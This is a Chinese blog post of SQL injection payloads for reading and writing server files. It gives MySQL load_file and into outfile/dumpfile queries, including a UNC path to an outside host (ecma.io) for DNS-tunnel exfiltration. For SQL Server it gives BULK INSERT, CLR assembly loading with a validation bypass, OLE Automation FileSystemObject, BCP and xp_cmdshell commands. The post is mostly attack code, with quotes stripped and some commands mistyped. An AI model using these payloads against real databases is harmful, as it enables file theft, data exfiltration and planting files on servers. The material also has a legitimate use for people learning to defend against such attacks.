SQL注入中文件读写的方法有哪些

73次阅读
没有评论

共计 1990 个字符,预计需要花费 5 分钟才能阅读完成。

这篇文章主要介绍了 SQL 注入中文件读写的方法有哪些,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让丸趣 TV 小编带着大家一起了解一下。

一、MySQL

读文件

常见的读文件,可以用 16 进制代替字符串

select load_file(c:/boot.ini)
select load_file(0x633a2f626f6f742e696e69)
select load_file(//ecma.io/1.txt) # smb 协议
select load_file(\\\\ecma.io\\1.txt) #  可用于 DNS 隧道 

写文件

我暂时已知 l 两种写文件的方式

select 0x313233 into outfile  D:/1.txt
select 0x313233 into dumpfile  D:/1.txt

二、SQL Server

读文件

1. BULK INSERT

create table result(res varchar(8000));
bulk insert result from  d:/1.txt

2. CLR 集成

//  开启 CLR 集成
exec sp_configure  show advanced options 
reconfigure;
exec sp_configure  clr enabled ,1
reconfigure
create assembly sqb from  d:\1.exe  with permission_set=unsafe

上面一句可以利用 create assembly 函数从远程服务器加载任何.NET 二进制文件到数据库中; 但是他会验证是否为合法.NET 程序,导致失败,下面是读取方式

select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files

绕过,首先加载一个有效的.NET 的二进制文件,然后追加文件即可,下面是绕过方法。

create assembly sqb from  d:\net.exe 
alter assembly sqb add file from  d:\1.txt 
alter assembly sqb add file from  d:\notnet.exe

3. Script.FileSystemObject

#  开启 Ole Automation Procedures
 
sp_configure  show advanced options 
RECONFIGURE;
sp_configure  Ole Automation Procedures 
RECONFIGURE;
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate  scripting.filesystemobject ,@o out
exec sp_oamethod @o,  opentextfile , @f out,  d:\1.txt , 1
exec @ret = sp_onmethod @f,  readline , @line out
while(@ret = 0) begin print @line exec @ret = sp_oamethod @f,  readline , @line out end

写文件

1. Script.FileSystemObject

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate  scripting.filesystemobject ,@o out
exec sp_oamethod @o,  createtextfile , @f out,  e:\1.txt , 1
exec @ret = sp_oamethod @f,  writeline , NULL , This is the test string

2. BCP 复制文件(测试失败,无 bcp.exe)

c:\windows system32 bcp  select name from sysobjects  query testout.txt -c -s 127.0.0.1 -U sa -p sa

3. xp_cmdshell

exec xp_cmdshell  echo test d:\1.txt

三、Oracle

pass,Oracle 太坑了~~~ 几乎都受到 PL/SQL 的限制,暂时不讨论

感谢你能够认真阅读完这篇文章,希望丸趣 TV 小编分享的“SQL 注入中文件读写的方法有哪些”这篇文章对大家有帮助,同时也希望大家多多支持丸趣 TV,关注丸趣 TV 行业资讯频道,更多相关知识等着你来学习!

正文完
 
丸趣
版权声明:本站原创文章,由 丸趣 2023-08-04发表,共计1990字。
转载说明:除特殊说明外本站除技术相关以外文章皆由网络搜集发布,转载请注明出处。
评论(没有评论)